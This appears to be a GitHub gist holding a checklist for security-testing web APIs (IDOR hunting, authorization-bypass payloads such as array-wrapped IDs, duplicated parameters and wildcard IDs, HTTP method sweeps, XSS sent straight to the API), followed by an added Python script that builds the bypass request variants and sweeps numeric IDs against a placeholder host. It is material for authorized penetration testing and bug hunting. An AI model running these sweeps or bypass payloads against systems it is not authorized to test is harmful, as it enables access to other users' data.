@Uyavuz24
Last active August 8, 2023 19:33
Our checklist for testing APIs
* If a wordlist-based brute force finds nothing on the API, crawl the application with hakrawler to discover endpoints instead
* Every domain could have an API. Append a .json extension to endpoints and look at the response
* If IDs are not numerical, try to find leaked IDs elsewhere in the application (e.g. posts the user created, and other features that reference a user)
* Some endpoints return a user's UUID in response to a lookup by e-mail address or similar fields
* If no user ID leaks anywhere, create a second account and swap in its user ID
* Check authorization (permissions) on every endpoint
* Change lowercase to uppercase or vice versa in endpoint paths (routing and access-control rules do not always match case the same way)
* After finding endpoints, run Arjun against them to discover hidden parameters
* Try every HTTP request method (GET, POST, PUT, PATCH, DELETE, OPTIONS, HEAD) on each endpoint
* Look for IDORs in HTTP headers and the request body, not only in the URL
* Always try numeric IDs. You may be able to access an object addressed by a non-numeric ID using a numeric one (e.g. replace amail@google.com with "100")
* If /api/v1/trips/666 returned 403, iterate the ID from 0 to 10000 (e.g. with Burp Intruder). The response may change for some IDs
* Hunt for special-event features
* Got 401/403 errors? AuthZ bypass tricks:
  * Wrap the ID in an array: {"id":111} --> {"id":[111]}
  * Wrap the ID in a JSON object: {"id":111} --> {"id":{"id":111}}
  * Send the ID twice (parameter pollution): URL?id=<LEGIT>&id=<VICTIM>
  * Send a wildcard: {"user_id":"*"}
* Also look at other endpoints or subdomains that may let you bypass authentication
* There can be many endpoints handling authentication; test each of them
* If you're working on an old domain, the API may be able to handle SOAP as well. Change the Content-Type to "application/xml" (also try "text/xml" and "application/soap+xml") and send a simple XML document in the request body
* Enumerate the API calls made by the web application front end
* If there is an export-to-file feature, try HTML/CSS/JS injection into the exported content
* APIs don't parse HTML but the front end does, so client-side XSS protection may be bypassed by sending the payload directly to the API
* If you know what runs on the backend, look up known exploitation techniques for that framework/language and its features
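The following script is an added example (not from the gist author) that automates several checklist items at once: the case-flipped paths, the HTTP method sweep, the array/JSON-wrap and wildcard ID tricks, the duplicated query parameter, and the numeric ID sweep with triage of responses that differ from the dominant status code. The base URL, endpoint and parameter names are placeholders; point it only at a host you are authorized to test.

```python
"""Generate authorization-bypass variants of an API request and triage ID sweeps.

Added example for this checklist; base URL, path and parameter names are
placeholders, not taken from any real target.
"""
import json
from urllib.parse import urlencode, urlsplit, urlunsplit

HTTP_METHODS = ("GET", "POST", "PUT", "PATCH", "DELETE", "OPTIONS", "HEAD")


def case_variants(path):
    """Yield distinct case mutations of each path segment (checklist: swap case)."""
    segments = path.strip("/").split("/")
    seen = set()
    for idx, seg in enumerate(segments):
        for variant in (seg.upper(), seg.lower(), seg.capitalize()):
            mutated = list(segments)
            mutated[idx] = variant
            candidate = "/" + "/".join(mutated)
            if candidate != path and candidate not in seen:
                seen.add(candidate)
                yield candidate


def id_body_variants(body, id_key, victim_id):
    """JSON body mutations from the 401/403 bypass tricks, keyed by a short name."""
    def with_id(value):
        mutated = dict(body)          # copy so the caller's baseline stays intact
        mutated[id_key] = value
        return mutated
    return {
        "victim_plain": with_id(victim_id),
        "array_wrap": with_id([victim_id]),
        "json_wrap": with_id({id_key: victim_id}),
        "wildcard": with_id("*"),
        "string_id": with_id(str(victim_id)),
    }


def duplicate_param_url(url, param, legit_id, victim_id):
    """URL?id=<LEGIT>&id=<VICTIM>: first-wins vs last-wins parsers may disagree."""
    parts = urlsplit(url)
    extra = urlencode([(param, legit_id), (param, victim_id)])
    query = parts.query + ("&" if parts.query else "") + extra
    return urlunsplit((parts.scheme, parts.netloc, parts.path, query, parts.fragment))


def build_requests(base_url, path, body, id_key, legit_id, victim_id):
    """Cross product of methods, path case variants and body variants, plus the
    duplicated-parameter GET. Each entry is a dict ready for send_http()."""
    reqs = []
    bodies = id_body_variants(body, id_key, victim_id)
    for method in HTTP_METHODS:
        for p in [path] + list(case_variants(path)):
            for name, b in bodies.items():
                reqs.append({"name": f"{method} {p} {name}", "method": method,
                             "url": base_url + p, "body": b})
    reqs.append({"name": f"GET {path} dup-param", "method": "GET",
                 "url": duplicate_param_url(base_url + path, id_key, legit_id, victim_id),
                 "body": None})
    return reqs


def sweep_ids(send, url_template, id_range):
    """Request url_template.format(id=i) for every i and group IDs by status,
    so a wall of 403s with a handful of 200s or 404s stands out."""
    by_status = {}
    for i in id_range:
        status, _ = send("GET", url_template.format(id=i), None)
        by_status.setdefault(status, []).append(i)
    return by_status


def anomalies(by_status):
    """Statuses (and their IDs) that differ from the most common status."""
    dominant = max(by_status, key=lambda s: len(by_status[s]))
    return {s: ids for s, ids in by_status.items() if s != dominant}


def send_http(method, url, body, headers=None):
    """Real sender (stdlib only). Returns (status, raw_body); HTTP errors are
    returned as statuses rather than raised so 401/403/404 can be triaged."""
    import urllib.error
    import urllib.request
    data = json.dumps(body).encode() if body is not None else None
    hdrs = {"Content-Type": "application/json", **(headers or {})}
    req = urllib.request.Request(url, data=data, method=method, headers=hdrs)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


if __name__ == "__main__":
    # Placeholder target; nothing is sent here, the variants are only printed.
    for r in build_requests("https://api.example.test", "/api/v1/trips",
                            {"id": 111, "note": "x"}, "id", 111, 222)[:5]:
        print(r["name"], r["url"], r["body"])
```

To run the sweep for real, pass `send_http` (with your own session's `Authorization` header in `headers`) to `sweep_ids`, then feed the result to `anomalies`; IDs that return something other than the dominant 403 are the ones to inspect by hand.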